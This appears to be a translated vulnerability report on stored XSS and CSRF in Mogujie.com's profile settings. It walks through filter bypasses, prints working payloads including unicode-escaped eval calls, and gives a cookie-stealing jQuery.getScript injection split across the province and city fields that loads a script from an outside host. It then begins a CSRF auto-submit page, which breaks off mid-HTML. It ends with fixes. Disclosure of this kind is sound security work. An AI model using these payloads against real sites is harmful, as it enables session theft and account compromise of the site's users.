Mogujie.com user profile settings do not strictly filter user-submitted data (stored XSS plus CSRF).
This problem was found a long time ago, last year. It was not reported to anyone who did not know Mogujie.com; I submitted it to WooYun last year and it was put on hold. Recently my mouse broke and it was inconvenient to get anything done, so I dug the notes out of my hard drive and am submitting it again to try my luck.

Open http://www.mogujie.com/settings/personal, the page for editing user profile information, and check where the submitted values are output. Almost all of them are output inside HTML tags, but the user's location (province and city) is output inside a JavaScript statement. A manual test showed that single quotes are not filtered in that field, which means the string in the JS statement can be closed from there. In a good mood, I submitted in the province field:

');eval(alert(123);

and waited for the pop-up, but was surprised to find none. Looking at the source, all the keywords needed for a pop-up had been stripped. Annoying, but a pop-up is too much fun to give up on, and there is another way: on this page the HTML decoding happens before the JavaScript is parsed, so the sensitive words can be HTML-entity-encoded and submitted again. Province field data:

%27%29%3B%26%23101%3Bval%28a%26%23108%3Bert%28123%29%29%3B

which is the URL encoding of

');&#101;val(a&#108;ert(123));

(URL-encoded because the payload contains an & symbol). Still no pop-up. Checking the source again: well done, programmers, what is going on here? You do not filter single quotes, but you do filter #, so the entity encoding is broken. Fine, there is still Unicode escaping.
So today we use Unicode escapes. Encoding the two sensitive words in ');eval(alert(123); gives:

');\u0065val(\u0061lert(123));

After submitting this, the pop-up appears. Cool, now let's get the cookie by loading an external JS file. Submitted code:

');\u0065val('window.s=docum\u0065nt.creat\u0065Element(String.fromCharCode(115,99,114,105,112,116);window.s.src=String.fromCharCode(104,116,116,112,47,120,115,115,46,109,101,50,50);docum\u0065nt.body.app\u0065ndChild(window.s)')

Checking the source again: the payload got truncated. That hurts, but there is no way around it except slimming the payload down. Submitted province data: 123456789012345678901234567890123456789012345678901234567890, repeated many times, to see how much survives in the output code. 30 characters survive in the province field, and another 30 in the city field, 60 in total. Subtract the 4 characters of the /**/ comment and the 5 characters needed to close the strings, ',' and ');, and 50 characters are usable. A Unicode-escaped payload does not fit, so another method is needed.

Continuing to fuzz by hand to see what is filtered: after painstaking testing, " > and & are converted to HTML entities; < and everything after it is stripped (asa<123213 becomes asa); common JS words such as eval, alert and document are stripped repeatedly (evaleval becomes empty), but \eval is not stripped. No filter rule is found in the front-end code, so the filtering regex runs on the server side and is a blacklist, which means any function not on the list gets through unfiltered. Looking at the page, it is very pretty, and jQuery is loaded in the head. Submit:

province=*/'//126.am/dTPsg2');//
city=','');jQuery.getScript(/*

(jQuery.getScript can be abbreviated to $.getScript.)
The /**/ comments out the ',' between the city and province values, so the getScript call spans both fields. After submission it works: open the page in a browser and the external script runs and obtains sensitive information.

Up to now the script only runs in my own session, not in anyone else's, and many vendors don't take this kind of vulnerability seriously, since they don't consider it very harmful. So let's turn it into something that affects every user. During testing I found that the profile update request can be submitted directly, with no CSRF protection on the configuration change. Looks like the escalation is just around the corner. The following page is constructed from the data structure of the submitted form:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Untitled Page</title>
<script type="text/javascript">
function send() {
  var f = document.getElementById("reg");
  f.submit();
}
</script>
In other words, Mogujie.com shows a warning prompt for untrusted external links, and I had originally planned to test whether it could be bypassed. The site staff are very dedicated: I posted links from several accounts and they were all blocked, I registered several more emails and finally gave up. If you are interested, you can test it yourself.

Solution:

1. Add a token to prevent CSRF; checking the Referer is too unreliable.

2. I cannot see why users need to submit the province and city as free text at all. Since they do, filter strictly: every special character (anything other than letters and digits) output inside the JavaScript should be encoded in hex escape (0xHH) form. There should be no way to bypass that.